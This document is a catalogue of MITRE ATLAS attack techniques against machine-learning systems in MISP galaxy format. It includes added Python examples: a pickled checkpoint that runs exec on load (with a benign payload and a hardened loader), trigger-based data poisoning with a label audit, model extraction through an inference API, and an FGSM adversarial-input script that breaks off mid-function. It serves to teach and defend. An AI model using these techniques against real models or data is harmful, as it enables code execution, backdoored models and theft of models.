Developing and staging machine learning attacks often requires expensive compute resources. Adversaries may need access to one or many GPUs in order to develop an attack. They may try to anonymously use free resources such as Google Colaboratory, or cloud resources such as AWS, Azure, or Google Cloud as an efficient way to stand up temporary resources to conduct operations. Multiple workspaces may be used to avoid detection.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Development Workspaces"

Table 5235. Table References

Links

https://atlas.mitre.org/techniques/AML.T0008.000

Consumer Hardware

Adversaries may acquire consumer hardware to conduct their attacks. Owning the hardware provides the adversary with complete control of the environment. These devices can be hard to trace.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Consumer Hardware"

Table 5236. Table References

Links

https://atlas.mitre.org/techniques/AML.T0008.001

ML Supply Chain Compromise

Adversaries may gain initial access to a system by compromising the unique portions of the ML supply chain. This could include [GPU Hardware](https://atlas.mitre.org/techniques/AML.T0010.000), [Data](https://atlas.mitre.org/techniques/AML.T0010.002) and its annotations, parts of the [ML Software](https://atlas.mitre.org/techniques/AML.T0010.001) stack, or the [Model](https://atlas.mitre.org/techniques/AML.T0010.003) itself. In some instances the attacker will need secondary access to fully carry out an attack using compromised components of the supply chain.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Supply Chain Compromise"

Table 5237. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010

GPU Hardware

Most machine learning systems require access to certain specialized hardware, typically GPUs. Adversaries can target machine learning systems by specifically targeting the GPU supply chain.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="GPU Hardware"

Table 5238. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.000

ML Software

Most machine learning systems rely on a limited set of machine learning frameworks. An adversary could get access to a large number of machine learning systems through a compromise of one of those frameworks' supply chains. Many machine learning projects also rely on other open source implementations of various algorithms. These can also be compromised in a targeted way to get access to specific systems.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Software"

Table 5239. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.001

Data

Data is a key vector of supply chain compromise for adversaries. Every machine learning project will require some form of data. Many rely on large open source datasets that are publicly available. An adversary could rely on compromising these sources of data. The malicious data could be a result of [Poison Training Data](https://atlas.mitre.org/techniques/AML.T0020) or include traditional malware.

An adversary can also target private datasets in the labeling phase. The creation of private datasets will often require the hiring of outside labeling services. An adversary can poison a dataset by modifying the labels being generated by the labeling service.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Data"

Table 5240. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.002

Model

Machine learning systems often rely on open-source models in various ways. Most commonly, the victim organization may be using these models for fine-tuning. These models are downloaded from an external source and then used as the base for the model as it is tuned on a smaller, private dataset. Loading a model often requires executing code stored in the saved model file itself. Such files can be compromised with traditional malware, or through adversarial machine learning techniques.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Model"

Table 5241. Table References

Links

https://atlas.mitre.org/techniques/AML.T0010.003

User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may inadvertently execute unsafe code introduced via [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010). Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="User Execution"

Table 5242. Table References

Links

https://atlas.mitre.org/techniques/AML.T0011

Unsafe ML Artifacts

Adversaries may develop unsafe ML artifacts that, when executed, have a deleterious effect. The adversary can use this technique to establish persistent access to systems. These models may be introduced via an [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010).

Serialization of models is a popular technique for model storage, transfer, and loading. However, loading a serialized model without proper checking presents an opportunity for code execution.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Unsafe ML Artifacts"

Table 5243. Table References

Links

https://atlas.mitre.org/techniques/AML.T0011.000
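The code-execution path that the Model and Unsafe ML Artifacts entries describe, shown as an added Python example that is not part of the MISP galaxy or of ATLAS: a pickle-serialized "checkpoint" that runs a constructed, benign payload (it only sets the environment variable ATLAS_DEMO_PAYLOAD) when loaded naively, beside a restricted loader that pins the artifact digest and refuses every global reference outside a hypothetical allowlist. BackdooredCheckpoint, WeightsOnlyUnpickler and the helper names are assumptions made for this example.

```python
"""Added example (not ATLAS or MISP code): a pickled model file is code.

Both checkpoints are constructed inline. The payload only sets an
environment variable so its execution is observable without doing harm.
"""
import hashlib
import io
import os
import pickle

MARKER = "ATLAS_DEMO_PAYLOAD"  # constructed marker name for this example
PAYLOAD_SRC = f"import os; os.environ['{MARKER}'] = 'executed'"


class BackdooredCheckpoint:
    """Object whose pickle stream calls builtins.exec at load time.
    pickle.load() invokes whatever callable __reduce__ names; nothing
    requires it to be a model class."""

    def __reduce__(self):
        return (exec, (PAYLOAD_SRC,))


def build_malicious_checkpoint():
    return pickle.dumps(BackdooredCheckpoint())


def build_benign_checkpoint():
    # Plain weights: only dict/str/list/float opcodes, no global lookups.
    return pickle.dumps({"layer1.weight": [[0.1, -0.2], [0.3, 0.4]],
                         "layer1.bias": [0.0, 0.5]})


def naive_load(blob):
    """Vulnerable pattern: pickle.load (or a framework loader built on it)
    applied to an untrusted file. Returns whatever the stream builds."""
    return pickle.loads(blob)


def payload_executed():
    return os.environ.get(MARKER) == "executed"


def sha256_hex(blob):
    return hashlib.sha256(blob).hexdigest()


class WeightsOnlyUnpickler(pickle.Unpickler):
    """Hardened loader: any global reference (class or function) outside a
    small allowlist is rejected, so the stream can only build containers."""

    ALLOWED = {  # hypothetical allowlist; extend only after review
        ("builtins", "dict"), ("builtins", "list"), ("builtins", "tuple"),
        ("builtins", "float"), ("builtins", "int"), ("builtins", "str"),
        ("collections", "OrderedDict"),
    }

    def find_class(self, module, name):
        if (module, name) in self.ALLOWED:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refusing global {module}.{name}")


def safe_load(blob, expected_sha256=None):
    """Integrity check first (pin the digest of the artifact you reviewed),
    then restricted unpickling."""
    if expected_sha256 is not None and sha256_hex(blob) != expected_sha256:
        raise ValueError("checkpoint digest mismatch")
    return WeightsOnlyUnpickler(io.BytesIO(blob)).load()


def try_safe_load(blob, expected_sha256=None):
    """Returns ("ok", object) or ("rejected", reason)."""
    try:
        return "ok", safe_load(blob, expected_sha256)
    except (pickle.UnpicklingError, ValueError) as exc:
        return "rejected", str(exc)


if __name__ == "__main__":
    mal = build_malicious_checkpoint()
    print("restricted loader:", try_safe_load(mal)[0], "| payload ran:", payload_executed())
    naive_load(mal)
    print("naive loader      : loaded | payload ran:", payload_executed())
```

The restricted loader narrows the attack surface but the pickle virtual machine still runs on attacker-controlled bytes, so the stronger control is to distribute weights in a format that carries tensors only and no code, and to verify a pinned digest or signature before any load at all.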

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access. Credentials may take the form of usernames and passwords of individual user accounts or API keys that provide access to various ML resources and services.

Compromised credentials may provide access to additional ML artifacts and allow the adversary to perform [Discover ML Artifacts](https://atlas.mitre.org/techniques/AML.T0007). Compromised credentials may also grant an adversary increased privileges such as write access to ML artifacts used during development or production.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Valid Accounts"

Table 5244. Table References

Links

https://atlas.mitre.org/techniques/AML.T0012

Discover ML Model Ontology

Adversaries may discover the ontology of a machine learning model’s output space, for example, the types of objects a model can detect. The adversary may discover the ontology by repeated queries to the model, forcing it to enumerate its output space. Alternatively, the ontology may be discovered in a configuration file or in documentation about the model.

The model ontology helps the adversary understand how the model is being used by the victim. It is useful to the adversary in creating targeted attacks.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Ontology"

Table 5245. Table References

Links

https://atlas.mitre.org/techniques/AML.T0013

Discover ML Model Family

Adversaries may discover the general family of the model. General information about the model may be revealed in documentation, or the adversary may use carefully constructed examples and analyze the model’s responses to categorize it.

Knowledge of the model family can help the adversary identify means of attacking the model and help tailor the attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Discover ML Model Family"

Table 5246. Table References

Links

https://atlas.mitre.org/techniques/AML.T0014

Evade ML Model

Adversaries can [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043) that prevent a machine learning model from correctly identifying the contents of the data. This technique can be used to evade a downstream task where machine learning is utilized. The adversary may evade machine learning based virus/malware detection, or network scanning towards the goal of a traditional cyber attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Evade ML Model"

Table 5247. Table References

Links

https://atlas.mitre.org/techniques/AML.T0015

Obtain Capabilities

Adversaries may search for and obtain software capabilities for use in their operations. Capabilities may be specific to ML-based attacks ([Adversarial ML Attack Implementations](https://atlas.mitre.org/techniques/AML.T0016.000)) or generic software tools repurposed for malicious intent ([Software Tools](https://atlas.mitre.org/techniques/AML.T0016.001)). In both instances, an adversary may modify or customize the capability to aid in targeting a particular ML system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Obtain Capabilities"

Table 5248. Table References

Links

https://atlas.mitre.org/techniques/AML.T0016

Adversarial ML Attack Implementations

Adversaries may search for existing open source implementations of machine learning attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial ML attacks as part of their attack.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Adversarial ML Attack Implementations"

Table 5249. Table References

Links

https://atlas.mitre.org/techniques/AML.T0016.000

Software Tools

Adversaries may search for and obtain software tools to support their operations. Software designed for legitimate use may be repurposed by an adversary for malicious intent. An adversary may modify or customize software tools to achieve their purpose. Software tools used to support attacks on ML systems are not necessarily ML-based themselves.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Software Tools"

Table 5250. Table References

Links

https://atlas.mitre.org/techniques/AML.T0016.001

Develop Capabilities

Adversaries may develop their own capabilities to support operations. This process encompasses identifying requirements, building solutions, and deploying capabilities. Capabilities used to support attacks on ML systems are not necessarily ML-based themselves. Examples include setting up websites with adversarial information or creating Jupyter notebooks with obfuscated exfiltration code.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Develop Capabilities"

Table 5251. Table References

Links

https://atlas.mitre.org/techniques/AML.T0017

Adversarial ML Attacks

Adversaries may develop their own adversarial attacks. They may leverage existing libraries as a starting point ([Adversarial ML Attack Implementations](https://atlas.mitre.org/techniques/AML.T0016.000)). They may implement ideas described in public research papers or develop custom made attacks for the victim model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Adversarial ML Attacks"

Table 5252. Table References

Links

https://atlas.mitre.org/techniques/AML.T0017.000

Backdoor ML Model

Adversaries may introduce a backdoor into a ML model. A backdoored model performs as expected under typical conditions, but will produce the adversary’s desired output when a trigger is introduced to the input data. A backdoored model provides the adversary with a persistent artifact on the victim system. The embedded vulnerability is typically activated at a later time by data samples containing the trigger ([Insert Backdoor Trigger](https://atlas.mitre.org/techniques/AML.T0043.004)).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Backdoor ML Model"

Table 5253. Table References

Links

https://atlas.mitre.org/techniques/AML.T0018

Poison ML Model

Adversaries may introduce a backdoor by training the model on poisoned data, or by interfering with its training process. The model learns to associate an adversary-defined trigger with the adversary’s desired output.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Poison ML Model"

Table 5254. Table References

Links

https://atlas.mitre.org/techniques/AML.T0018.000

Inject Payload

Adversaries may introduce a backdoor into a model by injecting a payload into the model file. The payload detects the presence of the trigger and bypasses the model, instead producing the adversary’s desired output.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Inject Payload"

Table 5255. Table References

Links

https://atlas.mitre.org/techniques/AML.T0018.001

Publish Poisoned Datasets

Adversaries may [Poison Training Data](https://atlas.mitre.org/techniques/AML.T0020) and publish it to a public location. The poisoned dataset may be a novel dataset or a poisoned variant of an existing open source dataset. This data may be introduced to a victim system via [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Publish Poisoned Datasets"

Table 5256. Table References

Links

https://atlas.mitre.org/techniques/AML.T0019

Poison Training Data

Adversaries may attempt to poison datasets used by a ML model by modifying the underlying data or its labels. This allows the adversary to embed vulnerabilities in ML models trained on the data that may not be easily detectable. Data poisoning attacks may or may not require modifying the labels. The embedded vulnerability is activated at a later time by data samples containing the trigger ([Insert Backdoor Trigger](https://atlas.mitre.org/techniques/AML.T0043.004)).

Poisoned data can be introduced via [ML Supply Chain Compromise](https://atlas.mitre.org/techniques/AML.T0010) or the data may be poisoned after the adversary gains [Initial Access](https://atlas.mitre.org/tactics/AML.TA0004) to the system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Poison Training Data"

Table 5257. Table References

Links

https://atlas.mitre.org/techniques/AML.T0020
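The two forms of poisoning named in the Poison Training Data entry (modifying labels, and modifying the data itself to carry a trigger), together with a pre-training label-consistency audit, as an added example that is not ATLAS or MISP code. The dataset, both poisoning functions and the k-nearest-neighbour audit are constructed for this example and every name in it is hypothetical; the point it demonstrates is which of the two poisons such an audit catches.

```python
"""Added example (not ATLAS or MISP code): two poisoning strategies and a
k-nearest-neighbour label audit that only catches one of them.

The audit flags a sample whose label disagrees with the majority label of
its k nearest neighbours. All data here is constructed.
"""
import random

N_PER_CLASS = 200
TRIGGER_DIM = 2  # third feature; 0.0 in every clean sample


def make_clean_dataset(rng):
    """Two well-separated classes in 2-D plus an all-zero trigger feature."""
    data = []
    for cls, centre in ((0, -2.0), (1, 2.0)):
        for _ in range(N_PER_CLASS):
            x = [centre + rng.uniform(-0.5, 0.5),
                 centre + rng.uniform(-0.5, 0.5), 0.0]
            data.append((x, cls))
    return data


def flip_random_labels(data, n_flip, rng):
    """Label-only poisoning: relabel n_flip random samples, features untouched."""
    idx = rng.sample(range(len(data)), n_flip)
    poisoned = list(data)
    for i in idx:
        x, y = poisoned[i]
        poisoned[i] = (x, 1 - y)
    return poisoned, set(idx)


def inject_backdoor(data, n_poison, trigger_value, target_label, rng):
    """Trigger poisoning: take class-0 samples, stamp the trigger feature and
    relabel them to the target class. The other features stay untouched."""
    class0 = [i for i, (_, y) in enumerate(data) if y == 0]
    idx = rng.sample(class0, n_poison)
    poisoned = list(data)
    for i in idx:
        x = list(poisoned[i][0])
        x[TRIGGER_DIM] = trigger_value
        poisoned[i] = (x, target_label)
    return poisoned, set(idx)


def _dist2(a, b):
    return sum((ai - bi) ** 2 for ai, bi in zip(a, b))


def knn_label_audit(data, k=5):
    """Indices whose label disagrees with the majority of their k nearest
    neighbours (the sample itself excluded)."""
    flagged = set()
    for i, (x, y) in enumerate(data):
        neighbours = sorted((j for j in range(len(data)) if j != i),
                            key=lambda j: _dist2(x, data[j][0]))[:k]
        votes = sum(data[j][1] for j in neighbours)
        majority = 1 if votes * 2 > k else 0
        if majority != y:
            flagged.add(i)
    return flagged


def run_audit(seed=3):
    """Apply each poison to a fresh clean copy and audit both."""
    rng = random.Random(seed)
    clean = make_clean_dataset(rng)
    flipped, flip_idx = flip_random_labels(clean, 5, rng)
    backdoored, bd_idx = inject_backdoor(clean, 20, 5.0, 1, rng)
    flip_flags = knn_label_audit(flipped)
    bd_flags = knn_label_audit(backdoored)
    return {
        "flip_caught": (flip_flags & flip_idx) == flip_idx,
        "flip_false_positives": len(flip_flags - flip_idx),
        "backdoor_flagged": len(bd_flags & bd_idx),
        "backdoor_total": len(bd_idx),
    }


if __name__ == "__main__":
    for key, value in run_audit().items():
        print(f"{key}: {value}")
```

The audit catches randomly flipped labels because a flipped sample sits among neighbours that still carry its original class. It misses the trigger poison entirely: the stamped samples are far from every clean sample along the trigger feature and close to each other, so they out-vote any clean neighbour. That is the "may not be easily detectable" property the entry describes, and it is why a label audit needs to be paired with a check on the feature distributions (a feature that is constant except on one small, single-label cluster).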

Establish Accounts

Adversaries may create accounts with various services for use in targeting, to gain access to resources needed in [ML Attack Staging](https://atlas.mitre.org/tactics/AML.TA0001), or for victim impersonation.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Establish Accounts"

Table 5258. Table References

Links

https://atlas.mitre.org/techniques/AML.T0021

Exfiltration via ML Inference API

Adversaries may exfiltrate private information via [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040). ML models have been shown to leak private information about their training data (e.g. [Infer Training Data Membership](https://atlas.mitre.org/techniques/AML.T0024.000), [Invert ML Model](https://atlas.mitre.org/techniques/AML.T0024.001)). The model itself may also be extracted ([Extract ML Model](https://atlas.mitre.org/techniques/AML.T0024.002)) for the purposes of [ML Intellectual Property Theft](https://atlas.mitre.org/techniques/AML.T0048.004).

Exfiltration of information relating to private training data raises privacy concerns. Private training data may include personally identifiable information, or other protected data.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via ML Inference API"

Table 5259. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024

Infer Training Data Membership

Adversaries may infer whether a data sample was a member of the target model’s training set, which raises privacy concerns. Some strategies make use of a shadow model that could be obtained via [Train Proxy via Replication](https://atlas.mitre.org/techniques/AML.T0005.001), others use statistics of model prediction scores.

This can cause the victim model to leak private information, such as PII of those in the training set or other forms of protected IP.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Infer Training Data Membership"

Table 5260. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024.000

Invert ML Model

Machine learning models' training data could be reconstructed by exploiting the confidence scores that are available via an inference API. By querying the inference API strategically, adversaries can back out potentially private information embedded within the training data. This could lead to privacy violations if the attacker can reconstruct the data of sensitive features used in the algorithm.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Invert ML Model"

Table 5261. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024.001

Extract ML Model

Adversaries may extract a functional copy of a private model. By repeatedly querying the victim’s [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040), the adversary can collect the target model’s inferences into a dataset. The inferences are used as labels for training a separate model offline that will mimic the behavior and performance of the target model.

Adversaries may extract the model to avoid paying per query in a machine learning as a service setting. Model extraction is used for [ML Intellectual Property Theft](https://atlas.mitre.org/techniques/AML.T0048.004).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Extract ML Model"

Table 5262. Table References

Links

https://atlas.mitre.org/techniques/AML.T0024.002
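The replication procedure described under Train Proxy via Replication and again under Extract ML Model, as an added worked example that is not part of the MISP galaxy or the ATLAS knowledge base. The victim is a constructed linear classifier behind a label-only inference API, the surrogate learner is a plain perceptron so the example needs only the Python standard library, and every name (VictimInferenceAPI, harvest_labels, train_surrogate) is hypothetical.

```python
"""Added example (not ATLAS or MISP code): model extraction by replication.

The victim is a constructed linear classifier hidden behind a label-only
inference API. The attacker code never reads its weights; it only queries
the endpoint, keeps the answers as labels and trains a surrogate offline.
"""
import random

N_FEATURES = 3
# Constructed victim parameters. Only VictimInferenceAPI may read them.
_VICTIM_W = [1.5, -2.0, 0.7]
_VICTIM_B = 0.3


class VictimInferenceAPI:
    """Label-only endpoint (no confidence scores). The query counter is the
    defender's detection signal: replication needs far more queries than
    ordinary use of the service."""

    def __init__(self):
        self.query_count = 0

    def predict(self, x):
        self.query_count += 1
        s = sum(w * xi for w, xi in zip(_VICTIM_W, x)) + _VICTIM_B
        return 1 if s > 0 else 0


def random_input(rng):
    return [rng.uniform(-3.0, 3.0) for _ in range(N_FEATURES)]


def harvest_labels(api, n_queries, rng):
    """Attacker side: probe the API with random inputs, keep its answers."""
    return [(x, api.predict(x))
            for x in (random_input(rng) for _ in range(n_queries))]


def surrogate_predict(model, x):
    w, b = model
    return 1 if sum(wi * xi for wi, xi in zip(w, x)) + b > 0 else 0


def train_surrogate(dataset, epochs=50, lr=0.1):
    """Offline perceptron fit to the harvested labels; no further API access."""
    w = [0.0] * N_FEATURES
    b = 0.0
    for _ in range(epochs):
        for x, y in dataset:
            err = y - surrogate_predict((w, b), x)
            if err:
                w = [wi + lr * err * xi for wi, xi in zip(w, x)]
                b += lr * err
    return w, b


def agreement(model, api, n_samples, rng):
    """Fraction of fresh inputs on which surrogate and victim agree."""
    hits = sum(surrogate_predict(model, x) == api.predict(x)
               for x in (random_input(rng) for _ in range(n_samples)))
    return hits / n_samples


def run_extraction(n_queries=3000, seed=7):
    """Returns (surrogate, held-out agreement, queries spent on extraction)."""
    rng = random.Random(seed)
    api = VictimInferenceAPI()
    surrogate = train_surrogate(harvest_labels(api, n_queries, rng))
    queries_used = api.query_count
    return surrogate, agreement(surrogate, api, 1000, rng), queries_used


if __name__ == "__main__":
    model, score, used = run_extraction()
    print(f"surrogate agrees with victim on {score:.1%} of held-out inputs "
          f"after {used} API queries")
```

Returning labels only, without confidence scores, slows extraction but does not prevent it, as the example shows. The practical detection point is the endpoint itself: thousands of queries from one key spread uniformly over the input space look nothing like normal client traffic, so per-key query volume and input-distribution monitoring are where the query counter above would live in production.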

Exfiltration via Cyber Means

Adversaries may exfiltrate ML artifacts or other information relevant to their goals via traditional cyber means.

See the ATT&CK [Exfiltration](https://attack.mitre.org/tactics/TA0010/) tactic for more information.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Exfiltration via Cyber Means"

Table 5263. Table References

Links

https://atlas.mitre.org/techniques/AML.T0025

Denial of ML Service

Adversaries may target machine learning systems with a flood of requests for the purpose of degrading or shutting down the service. Since many machine learning systems require significant amounts of specialized compute, they are often expensive bottlenecks that can become overloaded. Adversaries can intentionally craft inputs that require heavy amounts of useless compute from the machine learning system.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Denial of ML Service"

Table 5264. Table References

Links

https://atlas.mitre.org/techniques/AML.T0029

Erode ML Model Integrity

Adversaries may degrade the target model’s performance with adversarial data inputs to erode confidence in the system over time. This can lead to the victim organization wasting time and money both attempting to fix the system and performing the tasks it was meant to automate by hand.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Erode ML Model Integrity"

Table 5265. Table References

Links

https://atlas.mitre.org/techniques/AML.T0031

Cost Harvesting

Adversaries may target different machine learning services to send useless queries or computationally expensive inputs to increase the cost of running services at the victim organization. Sponge examples are a particular type of adversarial data designed to maximize energy consumption and thus operating cost.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Cost Harvesting"

Table 5266. Table References

Links

https://atlas.mitre.org/techniques/AML.T0034

ML Artifact Collection

Adversaries may collect ML artifacts for [Exfiltration](https://atlas.mitre.org/tactics/AML.TA0010) or for use in [ML Attack Staging](https://atlas.mitre.org/tactics/AML.TA0001). ML artifacts include models and datasets as well as other telemetry data produced when interacting with a model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Artifact Collection"

Table 5267. Table References

Links

https://atlas.mitre.org/techniques/AML.T0035

Data from Information Repositories

Adversaries may leverage information repositories to mine valuable information. Information repositories are tools that allow for storage of information, typically to facilitate collaboration or information sharing between users, and can store a wide variety of data that may aid adversaries in further objectives, or direct access to the target information.

Information stored in a repository may vary based on the specific instance or environment. Specific common information repositories include SharePoint, Confluence, and enterprise databases such as SQL Server.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Data from Information Repositories"

Table 5268. Table References

Links

https://atlas.mitre.org/techniques/AML.T0036

Data from Local System

Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.

This can include basic fingerprinting information and sensitive data such as SSH keys.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Data from Local System"

Table 5269. Table References

Links

https://atlas.mitre.org/techniques/AML.T0037

ML Model Inference API Access

Adversaries may gain access to a model via legitimate access to the inference API. Inference API access can be a source of information to the adversary ([Discover ML Model Ontology](https://atlas.mitre.org/techniques/AML.T0013), [Discover ML Model Family](https://atlas.mitre.org/techniques/AML.T0014)), a means of staging the attack ([Verify Attack](https://atlas.mitre.org/techniques/AML.T0042), [Craft Adversarial Data](https://atlas.mitre.org/techniques/AML.T0043)), or for introducing data to the target system for Impact ([Evade ML Model](https://atlas.mitre.org/techniques/AML.T0015), [Erode ML Model Integrity](https://atlas.mitre.org/techniques/AML.T0031)).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="ML Model Inference API Access"

Table 5270. Table References

Links

https://atlas.mitre.org/techniques/AML.T0040

Physical Environment Access

In addition to the attacks that take place purely in the digital domain, adversaries may also exploit the physical environment for their attacks. If the model is interacting with data collected from the real world in some way, the adversary can influence the model through access to wherever the data is being collected. By modifying the data in the collection process, the adversary can perform modified versions of attacks designed for digital access.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Physical Environment Access"

Table 5271. Table References

Links

https://atlas.mitre.org/techniques/AML.T0041

Verify Attack

Adversaries can verify the efficacy of their attack via an inference API or access to an offline copy of the target model. This gives the adversary confidence that their approach works and allows them to carry out the attack at a later time of their choosing. The adversary may verify the attack once but use it against many edge devices running copies of the target model. The adversary may verify their attack digitally, then deploy it in the [Physical Environment Access](https://atlas.mitre.org/techniques/AML.T0041) at a later time. Verifying the attack may be hard to detect since the adversary can use a minimal number of queries or an offline copy of the model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Verify Attack"

Table 5272. Table References

Links

https://atlas.mitre.org/techniques/AML.T0042

Craft Adversarial Data

Adversarial data are inputs to a machine learning model that have been modified such that they cause the adversary’s desired effect in the target model. Effects can range from misclassification, to missed detections, to maximising energy consumption. Typically, the modification is constrained in magnitude or location so that a human still perceives the data as if it were unmodified, but human perceptibility may not always be a concern depending on the adversary’s intended effect. For example, an adversarial input for an image classification task is an image the machine learning model would misclassify, but a human would still recognize as containing the correct class.

Depending on the adversary’s knowledge of and access to the target model, the adversary may use different classes of algorithms to develop the adversarial example such as [White-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.000), [Black-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.001), [Black-Box Transfer](https://atlas.mitre.org/techniques/AML.T0043.002), or [Manual Modification](https://atlas.mitre.org/techniques/AML.T0043.003).

The adversary may [Verify Attack](https://atlas.mitre.org/techniques/AML.T0042) to confirm their approach works if they have white-box or inference API access to the model. This allows the adversary to gain confidence that their attack is effective before using it in a "live" environment where it may be noticed. They can then use the attack at a later time to accomplish their goals. An adversary may optimize adversarial examples for [Evade ML Model](https://atlas.mitre.org/techniques/AML.T0015), or to [Erode ML Model Integrity](https://atlas.mitre.org/techniques/AML.T0031).

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Craft Adversarial Data"

Table 5273. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043

White-Box Optimization

In White-Box Optimization, the adversary has full access to the target model and optimizes the adversarial example directly. Adversarial examples crafted in this manner are the most effective against the target model.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="White-Box Optimization"

Table 5274. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.000

Black-Box Optimization

In Black-Box attacks, the adversary has only black-box access to the target model (i.e. [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040)). With black-box attacks, the adversary may be using an API that the victim is monitoring. These attacks are generally less effective and require more inferences than [White-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.000) attacks, but they require much less access.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Optimization"

Table 5275. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.001

Black-Box Transfer

In Black-Box Transfer attacks, the adversary uses one or more proxy models (trained via [Create Proxy ML Model](https://atlas.mitre.org/techniques/AML.T0005) or [Train Proxy via Replication](https://atlas.mitre.org/techniques/AML.T0005.001)) that they have full access to and that are representative of the target model. The adversary uses [White-Box Optimization](https://atlas.mitre.org/techniques/AML.T0043.000) on the proxy models to generate adversarial examples. If the set of proxy models is close enough to the target model, the adversarial example should generalize from one to another. This means that an attack that works for the proxy models will likely then work for the target model. If the adversary has [ML Model Inference API Access](https://atlas.mitre.org/techniques/AML.T0040), they may use it to [Verify Attack](https://atlas.mitre.org/techniques/AML.T0042) and confirm that the attack is working, and incorporate that information into their training process.

The tag is: misp-galaxy:mitre-atlas-attack-pattern="Black-Box Transfer"

Table 5276. Table References

Links

https://atlas.mitre.org/techniques/AML.T0043.002
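The relationship between Craft Adversarial Data, White-Box Optimization, Black-Box Transfer and Verify Attack, shown on a model small enough to check by hand, as an added example that is not ATLAS or MISP code. VICTIM, GOOD_PROXY, POOR_PROXY and the input are constructed linear classifiers; the perturbation is a single fast-gradient-sign step, for which a linear model gives a closed-form minimal L-infinity budget. All function and constant names are hypothetical.

```python
"""Added example (not ATLAS or MISP code): crafting an adversarial input
against a linear classifier with one fast-gradient-sign step, first with
white-box access, then by transfer from a proxy plus one verification query.

Models and input are constructed; the weights were chosen so every score
can be recomputed by hand.
"""

# Constructed victim; only victim_inference_api() below may read it.
VICTIM = {"w": [1.5, -2.0, 0.7], "b": 0.3}
# Constructed proxies: one whose weight signs all match the victim, one whose
# third sign is wrong (a proxy trained on less representative data).
GOOD_PROXY = {"w": [1.3, -1.8, 0.9], "b": 0.2}
POOR_PROXY = {"w": [1.3, -1.8, -0.2], "b": 0.2}

QUERY_LOG = []  # every victim query; the defender's only view of the attack


def score(model, x):
    return sum(w * xi for w, xi in zip(model["w"], x)) + model["b"]


def label(model, x):
    return 1 if score(model, x) > 0 else 0


def victim_inference_api(x):
    QUERY_LOG.append(list(x))
    return label(VICTIM, x)


def reset_query_log():
    QUERY_LOG.clear()


def sign(v):
    return (v > 0) - (v < 0)


def fgsm(model, x, eps):
    """One fast-gradient-sign step pushing the class-1 score down.
    For a linear score the gradient with respect to x is just w."""
    return [xi - eps * sign(wi) for xi, wi in zip(x, model["w"])]


def minimal_eps(model, x):
    """A sign step of size eps lowers a linear score by exactly eps*||w||_1,
    so this is the smallest L-inf budget that reaches the boundary."""
    return score(model, x) / sum(abs(w) for w in model["w"])


def linf(a, b):
    return max(abs(ai - bi) for ai, bi in zip(a, b))


def white_box_attack(model, x, slack=1.05):
    """Full model access: optimise directly against the target weights."""
    eps = slack * minimal_eps(model, x)
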